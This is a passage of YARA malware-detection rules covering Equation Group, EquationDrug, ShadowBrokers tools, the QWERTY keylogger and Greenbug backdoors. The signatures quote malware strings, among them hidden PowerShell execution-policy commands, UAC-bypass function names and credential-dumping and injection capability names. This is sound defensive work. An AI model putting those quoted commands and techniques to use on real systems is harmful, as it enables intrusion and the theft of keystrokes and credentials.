"Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f" strings: $mz = { 4d 5a } $s0 = "c:\\users\\rmgree5\\" ascii $s1 = "msrtdv.sys" fullword wide $x1 = "svrg.pdb" fullword ascii $x2 = "W32pServiceTable" fullword ascii $x3 = "In forma" fullword ascii $x4 = "ReleaseF" fullword ascii $x5 = "criptor" fullword ascii $x6 = "astMutex" fullword ascii $x7 = "ARASATAU" fullword ascii $x8 = "R0omp4ar" fullword ascii $z1 = "H.text" fullword ascii $z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide $z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword condition: ( $mz at 0 ) and filesize < 250000 and ($s0 or ( $s1 and 6 of ($x*) ) or ( 6 of ($x*) and all of ($z*) )) } rule Equation_Kaspersky_GreyFishInstaller { meta: description = "Equation Group Malware - Grey Fish" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35" strings: $s0 = "DOGROUND.exe" fullword wide $s1 = "Windows Configuration Services" fullword wide $s2 = "GetMappedFilenameW" fullword ascii condition: all of them } rule Equation_Kaspersky_EquationDrugInstaller { meta: description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "61fab1b8451275c7fd580895d9c68e152ff46417" strings: $mz = { 4d 5a } $s0 = "\\system32\\win32k.sys" fullword wide $s1 = "ALL_FIREWALLS" fullword ascii $x1 = "@prkMtx" fullword wide $x2 = "STATIC" fullword wide $x3 = "windir" fullword wide $x4 = "cnFormVoidFBC" fullword wide $x5 = "CcnFormSyncExFBC" fullword wide $x6 = "WinStaObj" fullword wide $x7 = "BINRES" fullword wide condition: ( $mz at 0 ) and filesize < 500000 and all of ($s*) and 5 of ($x*) } rule Equation_Kaspersky_EquationLaserInstaller { meta: description = "Equation Group Malware - EquationLaser Installer" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df" strings: $mz = { 4d 5a } $s0 = "Failed to get Windows version" fullword ascii $s1 = "lsasrv32.dll and lsass.exe" fullword wide $s2 = "\\\\%s\\mailslot\\%s" fullword ascii $s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii $s4 = "lsasrv32.dll" fullword ascii $s5 = "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" fullword ascii $s6 = "%s %02x %s" fullword ascii $s7 = "VIEWERS" fullword ascii $s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide condition: ( $mz at 0 ) and filesize < 250000 and 6 of ($s*) } rule Equation_Kaspersky_FannyWorm { meta: description = "Equation Group Malware - Fanny Worm" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7" strings: $mz = { 4d 5a } $s1 = "x:\\fanny.bmp" fullword ascii $s2 = "32.exe" fullword ascii $s3 = "d:\\fanny.bmp" fullword ascii $x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii $x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii $x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii $x4 = "\\system32\\win32k.sys" fullword wide $x5 = "\\AGENTCPD.DLL" fullword ascii $x6 = "agentcpd.dll" fullword ascii $x7 = "PADupdate.exe" fullword ascii $x8 = "dll_installer.dll" fullword ascii $x9 = "\\restore\\" fullword ascii $x10 = "Q:\\__?__.lnk" fullword ascii $x11 = "Software\\Microsoft\\MSNetMng" fullword ascii $x12 = "\\shelldoc.dll" fullword ascii $x13 = "file size = %d bytes" fullword ascii $x14 = "\\MSAgent" fullword ascii $x15 = "Global\\RPCMutex" fullword ascii $x16 = "Global\\DirectMarketing" fullword ascii condition: ( $mz at 0 ) and filesize < 300000 and (( 2 of ($s*) ) or ( 1 of ($s*) and 6 of ($x*) ) or ( 14 of ($x*))) } rule Equation_Kaspersky_HDD_reprogramming_module { meta: description = "Equation Group Malware - HDD reprogramming module" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500" strings: $mz = { 4d 5a } $s0 = "nls_933w.dll" fullword ascii $s1 = "BINARY" fullword wide $s2 = "KfAcquireSpinLock" fullword ascii $s3 = "HAL.dll" fullword ascii $s4 = "READ_REGISTER_UCHAR" fullword ascii condition: ( $mz at 0 ) and filesize < 300000 and all of ($s*) } rule Equation_Kaspersky_EOP_Package { meta: description = "Equation Group Malware - EoP package and malware launcher" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962" strings: $mz = { 4d 5a } $s0 = "abababababab" fullword ascii $s1 = "abcdefghijklmnopq" fullword ascii $s2 = "@STATIC" fullword wide $s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii $s4 = "@prkMtx" fullword wide $s5 = "prkMtx" fullword wide $s6 = "cnFormVoidFBC" fullword wide condition: ( $mz at 0 ) and filesize < 100000 and all of ($s*) } rule Equation_Kaspersky_TripleFantasy_Loader { meta: description = "Equation Group Malware - TripleFantasy Loader" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3" strings: $mz = { 4d 5a } $x1 = "Original Innovations, LLC" fullword wide $x2 = "Moniter Resource Protocol" fullword wide $x3 = "ahlhcib.dll" fullword wide $s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii $s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii $s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii $s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii $s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii $s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii condition: ( $mz at 0 ) and filesize < 50000 and ( all of ($x*) and all of ($s*) ) } /* Rule generated from the mentioned keywords */ rule Equation_Kaspersky_SuspiciousString { meta: description = "Equation Group Malware - suspicious string found in sample" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/17" score = 60 strings: $mz = { 4d 5a } $s1 = "i386\\DesertWinterDriver.pdb" fullword $s2 = "Performing UR-specific post-install..." $s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!" $s4 = "STRAITSHOOTER30.exe" $s5 = "standalonegrok_2.1.1.1" $s6 = "c:\\users\\rmgree5\\" condition: ( $mz at 0 ) and filesize < 500000 and all of ($s*) } /* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */ rule EquationDrug_NetworkSniffer1 { meta: description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce" strings: $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide $s3 = "sys\\mstcp32.dbg" fullword ascii $s7 = "mstcp32.sys" fullword wide $s8 = "p32.sys" fullword ascii $s9 = "\\Device\\%ws_%ws" fullword wide $s10 = "\\DosDevices\\%ws" fullword wide $s11 = "\\Device\\%ws" fullword wide condition: all of them } rule EquationDrug_CompatLayer_UnilayDLL { meta: description = "EquationDrug - Unilay.DLL" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "a3a31937956f161beba8acac35b96cb74241cd0f" strings: $mz = { 4d 5a } $s0 = "unilay.dll" fullword ascii condition: ( $mz at 0 ) and $s0 } rule EquationDrug_HDDSSD_Op { meta: description = "EquationDrug - HDD/SSD firmware operation - nls_933w.dll" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500" strings: $s0 = "nls_933w.dll" fullword ascii condition: all of them } rule EquationDrug_NetworkSniffer2 { meta: description = "EquationDrug - Network Sniffer - tdip.sys" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f" strings: $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide $s1 = "IP Transport Driver" fullword wide $s2 = "tdip.sys" fullword wide $s3 = "sys\\tdip.dbg" fullword ascii $s4 = "dip.sys" fullword ascii $s5 = "\\Device\\%ws_%ws" fullword wide $s6 = "\\DosDevices\\%ws" fullword wide $s7 = "\\Device\\%ws" fullword wide condition: all of them } rule EquationDrug_NetworkSniffer3 { meta: description = "EquationDrug - Network Sniffer - tdip.sys" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "14599516381a9646cd978cf962c4f92386371040" strings: $s0 = "Corporation. All rights reserved." fullword wide $s1 = "IP Transport Driver" fullword wide $s2 = "tdip.sys" fullword wide $s3 = "tdip.pdb" fullword ascii condition: all of them } rule EquationDrug_VolRec_Driver { meta: description = "EquationDrug - Collector plugin for Volrec - msrstd.sys" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c" strings: $s0 = "msrstd.sys" fullword wide $s1 = "msrstd.pdb" fullword ascii $s2 = "msrstd driver" fullword wide condition: all of them } rule EquationDrug_KernelRootkit { meta: description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "597715224249e9fb77dc733b2e4d507f0cc41af6" strings: $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide $s1 = "Parmsndsrv.dbg" fullword ascii $s2 = "\\Registry\\User\\CurrentUser\\" fullword wide $s3 = "msndsrv.sys" fullword wide $s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" fullword wide $s6 = "\\Device\\%ws_%ws" fullword wide $s7 = "\\DosDevices\\%ws" fullword wide $s9 = "\\Device\\%ws" fullword wide condition: all of them } rule EquationDrug_Keylogger { meta: description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5" strings: $s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide $s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide $s3 = "\\DosDevices\\Gk" fullword wide $s5 = "\\Device\\Gk0" fullword wide condition: all of them } rule EquationDrug_NetworkSniffer4 { meta: description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "cace40965f8600a24a2457f7792efba3bd84d9ba" strings: $s0 = "Copyright 1999 RAVISENT Technologies Inc." fullword wide $s1 = "\\systemroot\\" fullword ascii $s2 = "RAVISENT Technologies Inc." fullword wide $s3 = "Created by VIONA Development" fullword wide $s4 = "\\Registry\\User\\CurrentUser\\" fullword wide $s5 = "\\device\\harddiskvolume" fullword wide $s7 = "ATMDKDRV.SYS" fullword wide $s8 = "\\Device\\%ws_%ws" fullword wide $s9 = "\\DosDevices\\%ws" fullword wide $s10 = "CineMaster C 1.1 WDM Main Driver" fullword wide $s11 = "\\Device\\%ws" fullword wide $s13 = "CineMaster C 1.1 WDM" fullword wide condition: all of them } rule EquationDrug_PlatformOrchestrator { meta: description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "febc4f30786db7804008dc9bc1cebdc26993e240" strings: $s0 = "SERVICES.EXE" fullword wide $s1 = "\\command.com" fullword wide $s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide $s3 = "LSASS.EXE" fullword wide $s4 = "Windows Configuration Services" fullword wide $s8 = "unilay.dll" fullword ascii condition: all of them } rule EquationDrug_NetworkSniffer5 { meta: description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "09399b9bd600d4516db37307a457bc55eedcbd17" strings: $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide $s2 = "atmdkdrv.sys" fullword wide $s4 = "\\Device\\%ws_%ws" fullword wide $s5 = "\\DosDevices\\%ws" fullword wide $s6 = "\\Device\\%ws" fullword wide condition: all of them } rule EquationDrug_FileSystem_Filter { meta: description = "EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys" author = "Florian Roth @4nc4p" reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/" date = "2015/03/11" hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13" strings: $s0 = "volrec.sys" fullword wide $s1 = "volrec.pdb" fullword ascii $s2 = "Volume recognizer driver" fullword wide condition: all of them } rule apt_equation_keyword { meta: description = "Rule to detect Equation group's keyword in executable file" author = "Florian Roth @4nc4p" last_modified = "2015-09-26" reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/" strings: $a1 = "Backsnarf_AB25" wide $a2 = "Backsnarf_AB25" ascii condition: uint16(0) == 0x5a4d and 1 of ($a*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2017-01-08 Identifier: ShadowBroker Screenshot Rules */ /* Rule Set ----------------------------------------------------------------- */ rule FVEY_ShadowBrokers_Jan17_Screen_Strings { meta: description = "Detects strings derived from the ShadowBroker's leak of Windows tools/exploits" author = "Florian Roth" reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message7/" date = "2017-01-08" strings: $x1 = "Danderspritz" ascii wide fullword $x2 = "DanderSpritz" ascii wide fullword $x3 = "PeddleCheap" ascii wide fullword $x4 = "ChimneyPool Addres" ascii wide fullword $a1 = "Getting remote time" fullword ascii $a2 = "RETRIEVED" fullword ascii $b1 = "Added Ops library to Python search path" fullword ascii $b2 = "target: z0.0.0.1" fullword ascii $c1 = "Psp_Avoidance" fullword ascii $c2 = "PasswordDump" fullword ascii $c3 = "InjectDll" fullword ascii $c4 = "EventLogEdit" fullword ascii $c5 = "ProcessModify" fullword ascii $d1 = "Mcl_NtElevation" fullword ascii wide $d2 = "Mcl_NtNativeApi" fullword ascii wide $d3 = "Mcl_ThreatInject" fullword ascii wide $d4 = "Mcl_NtMemory" fullword ascii wide condition: filesize < 2000KB and (1 of ($x*) or all of ($a*) or 1 of ($b*) or ( uint16(0) == 0x5a4d and 1 of ($c*) ) or 3 of ($c*) or ( uint16(0) == 0x5a4d and 3 of ($d*) )) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" /* FIVE EYES ------------------------------------------------------------------------------- */ rule FiveEyes_QUERTY_Malwareqwerty_20121 { meta: description = "FiveEyes QUERTY Malware - file 20121.xml" author = "Florian Roth" reference = "http://www.spiegel.de/media/media-35668.pdf" date = "2015/01/18" hash = "8263fb58350f3b1d3c4220a602421232d5e40726" strings: $s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii $s1 = "<name>20121.dll</name>" fullword ascii $s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii $s4 = "<platform type=\"1\">" fullword ascii $s5 = "</plugin>" fullword ascii $s6 = "</pluginConfig>" fullword ascii $s7 = "<pluginConfig>" fullword ascii $s8 = "</platform>" fullword ascii $s9 = "</lpConfig>" fullword ascii $s10 = "<lpConfig>" fullword ascii condition: 9 of them } rule FiveEyes_QUERTY_Malwaresig_20123_sys { meta: description = "FiveEyes QUERTY Malware - file 20123.sys.bin" author = "Florian Roth" reference = "http://www.spiegel.de/media/media-35668.pdf" date = "2015/01/18" hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099" strings: $s0 = "20123.dll" fullword ascii $s1 = "kbdclass.sys" fullword wide $s2 = "IoFreeMdl" fullword ascii $s3 = "ntoskrnl.exe" fullword ascii $s4 = "KfReleaseSpinLock" fullword ascii condition: all of them } rule FiveEyes_QUERTY_Malwaresig_20123_cmdDef { meta: description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml" author = "Florian Roth" reference = "http://www.spiegel.de/media/media-35668.pdf" date = "2015/01/18" hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd" strings: $s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii $s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii $s2 = "<commands/>" fullword ascii $s3 = "</version>" fullword ascii $s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii $s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii $s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii $s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii $s8 = "<dllDepend>None</dllDepend>" fullword ascii $s9 = "<minorType>0</minorType>" fullword ascii $s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii $s11 = "</comments>" fullword ascii $s12 = "<comments>" fullword ascii $s13 = "<majorType>1</majorType>" fullword ascii $s14 = "<files>None</files>" fullword ascii $s15 = "<poc>Erebus</poc>" fullword ascii $s16 = "</plugin>" fullword ascii $s17 = "<team>None</team>" fullword ascii $s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii $s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii $s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii condition: 14 of them } rule FiveEyes_QUERTY_Malwaresig_20121_dll { meta: description = "FiveEyes QUERTY Malware - file 20121.dll.bin" author = "Florian Roth" reference = "http://www.spiegel.de/media/media-35668.pdf" date = "2015/01/18" hash = "89504d91c5539a366e153894c1bc17277116342b" strings: $s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii $s1 = "20121.dll" fullword ascii condition: all of them } rule FiveEyes_QUERTY_Malwareqwerty_20123 { meta: description = "FiveEyes QUERTY Malware - file 20123.xml" author = "Florian Roth" reference = "http://www.spiegel.de/media/media-35668.pdf" date = "2015/01/18" hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9" strings: $s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii $s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii $s2 = "<name>20123.sys</name>" fullword ascii $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii $s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii $s5 = "<platform type=\"1\">" fullword ascii $s6 = "</plugin>" fullword ascii $s7 = "</pluginConfig>" fullword ascii $s8 = "<pluginConfig>" fullword ascii $s9 = "</platform>" fullword ascii $s10 = "</lpConfig>" fullword ascii $s11 = "<lpConfig>" fullword ascii condition: 9 of them } rule FiveEyes_QUERTY_Malwaresig_20120_dll { meta: description = "FiveEyes QUERTY Malware - file 20120.dll.bin" author = "Florian Roth" reference = "http://www.spiegel.de/media/media-35668.pdf" date = "2015/01/18" hash = "6811bfa3b8cda5147440918f83c40237183dbd25" strings: $s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" fullword wide $s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" fullword wide $s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii $s3 = "- Log Used (number of windows) - %d" fullword wide $s4 = "- Log Limit (number of windows) - %d" fullword wide $s5 = "Process or User Default Language" fullword wide $s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide $s7 = "- Logging of keystrokes is switched ON" fullword wide $s8 = "- Logging of keystrokes is switched OFF" fullword wide $s9 = "Qwerty is currently logging active windows with titles containing the fo" wide $s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide $s11 = "FAILED to get Qwerty Status" fullword wide $s12 = "- Successfully retrieved Log from Implant." fullword wide $s13 = "- Logging of all Windows is toggled ON" fullword wide $s14 = "- Logging of all Windows is toggled OFF" fullword wide $s15 = "Qwerty FAILED to retrieve window list." fullword wide $s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide $s17 = "The implant failed to return a valid status" fullword ascii $s18 = "- Log files were NOT generated!" fullword wide $s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide $s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide condition: 10 of them } rule FiveEyes_QUERTY_Malwaresig_20120_cmdDef { meta: description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml" author = "Florian Roth" reference = "http://www.spiegel.de/media/media-35668.pdf" date = "2015/01/18" hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea" strings: $s0 = "This PPC gets the current keystroke log." fullword ascii $s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii $s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii $s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii $s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii $s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii $s6 = "<name>Get Keystroke Log</name>" fullword ascii $s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii $s8 = "<definition>display help for this function</definition>" fullword ascii $s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii $s10 = "Set the log limit (in number of windows)" fullword ascii $s11 = "<example>qwgetlog</example>" fullword ascii $s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii $s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii $s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii $s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii $s16 = "<command id=\"32\">" fullword ascii $s17 = "<command id=\"3\">" fullword ascii $s18 = "<command id=\"7\">" fullword ascii $s19 = "<command id=\"1\">" fullword ascii $s20 = "<command id=\"4\">" fullword ascii condition: 10 of them } rule FiveEyes_QUERTY_Malwareqwerty_20120 { meta: description = "FiveEyes QUERTY Malware - file 20120.xml" author = "Florian Roth" reference = "http://www.spiegel.de/media/media-35668.pdf" date = "2015/01/18" hash = "597082f05bfd3225587d480c30f54a7a1326a892" strings: $s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii $s1 = "<name>20120.dll</name>" fullword ascii $s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii $s4 = "<platform type=\"1\">" fullword ascii $s5 = "</plugin>" fullword ascii $s6 = "</pluginConfig>" fullword ascii $s7 = "<pluginConfig>" fullword ascii $s8 = "</platform>" fullword ascii $s9 = "</lpConfig>" fullword ascii $s10 = "<lpConfig>" fullword ascii condition: all of them } rule FiveEyes_QUERTY_Malwaresig_20121_cmdDef { meta: description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml" author = "Florian Roth" reference = "http://www.spiegel.de/media/media-35668.pdf" date = "2015/01/18" hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907" strings: $s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii $s1 = "<message>Failed to get File Time</message>" fullword ascii $s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii $s3 = "<message>Failed to set File Time</message>" fullword ascii $s4 = "</commands>" fullword ascii $s5 = "<commands>" fullword ascii $s6 = "</version>" fullword ascii $s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii $s8 = "<message>No Comms. with Driver</message>" fullword ascii $s9 = "</error>" fullword ascii $s10 = "<message>Invalid File Size</message>" fullword ascii $s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii $s12 = "<message>File Size Mismatch</message>" fullword ascii $s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii $s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii $s15 = "<dllDepend>None</dllDepend>" fullword ascii $s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii $s17 = "<rightsRequired>None</rightsRequired>" fullword ascii $s18 = "<minorType>0</minorType>" fullword ascii $s19 = "<code>00001002</code>" fullword ascii $s20 = "<code>00001001</code>" fullword ascii condition: 12 of them } /* Yara Rule Set Author: Florian Roth Date: 2017-01-25 Identifier: Greenbug Malware */ /* Rule Set ----------------------------------------------------------------- */ rule Greenbug_Malware_1 { meta: description = "Detects Malware from Greenbug Incident" author = "Florian Roth" reference = "https://goo.gl/urp4CD" date = "2017-01-25" hash1 = "dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76" strings: $s1 = "vailablez" fullword ascii $s2 = "Sfouglr" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule Greenbug_Malware_2 { meta: description = "Detects Backdoor from Greenbug Incident" author = "Florian Roth" reference = "https://goo.gl/urp4CD" date = "2017-01-25" hash1 = "6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d" hash2 = "21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685" hash3 = "319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6c" strings: $x1 = "|||Command executed successfully" fullword ascii $x2 = "\\Release\\Bot Fresh.pdb" ascii $x3 = "C:\\ddd\\a1.txt" fullword wide $x4 = "Bots\\Bot5\\x64\\Release" ascii $x5 = "Bot5\\Release\\Ism.pdb" ascii $x6 = "Bot\\Release\\Ism.pdb" ascii $x7 = "\\Bot Fresh\\Release\\Bot" ascii $s1 = "/Home/SaveFile?commandId=CmdResult=" fullword wide $s2 = "raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday" fullword ascii $s3 = "Set-Cookie:\\b*{.+?}\\n" fullword wide $s4 = "SELECT * FROM AntiVirusProduct" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and ( 1 of ($x*) or 2 of them ) ) or ( 3 of them ) } rule Greenbug_Malware_3 { meta: description = "Detects Backdoor from Greenbug Incident" author = "Florian Roth" reference = "https://goo.gl/urp4CD" date = "2017-01-25" super_rule = 1 hash1 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49" hash2 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c" strings: $x1 = "F:\\Projects\\Bot\\Bot\\Release\\Ism.pdb" fullword ascii $x2 = "C:\\ddd\\wer2.txt" fullword wide $x3 = "\\Microsoft\\Windows\\tmp43hh11.txt" fullword wide condition: 1 of them } rule Greenbug_Malware_4 { meta: description = "Detects ISMDoor Backdoor" author = "Florian Roth" reference = "https://goo.gl/urp4CD" date = "2017-01-25" super_rule = 1 hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f" hash2 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9" strings: $s1 = "powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuser" fullword ascii $s2 = "powershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"" fullword ascii $s3 = "c:\\windows\\temp\\tmp8873" fullword ascii $s4 = "taskkill /im winit.exe /f" fullword ascii $s5 = "invoke-psuacme" $s6 = "-method oobe -payload \"\"" fullword ascii $s7 = "C:\\ProgramData\\stat2.dat" fullword wide $s8 = "Invoke-bypassuac" fullword ascii $s9 = "Start Keylog Done" fullword wide $s10 = "Microsoft\\Windows\\WinIt.exe" fullword ascii $s11 = "Microsoft\\Windows\\Tmp9932u1.bat\"" fullword ascii $s12 = "Microsoft\\Windows\\tmp43hh11.txt" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them ) } rule Greenbug_Malware_5 { meta: description = "Auto-generated rule - from files 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f, 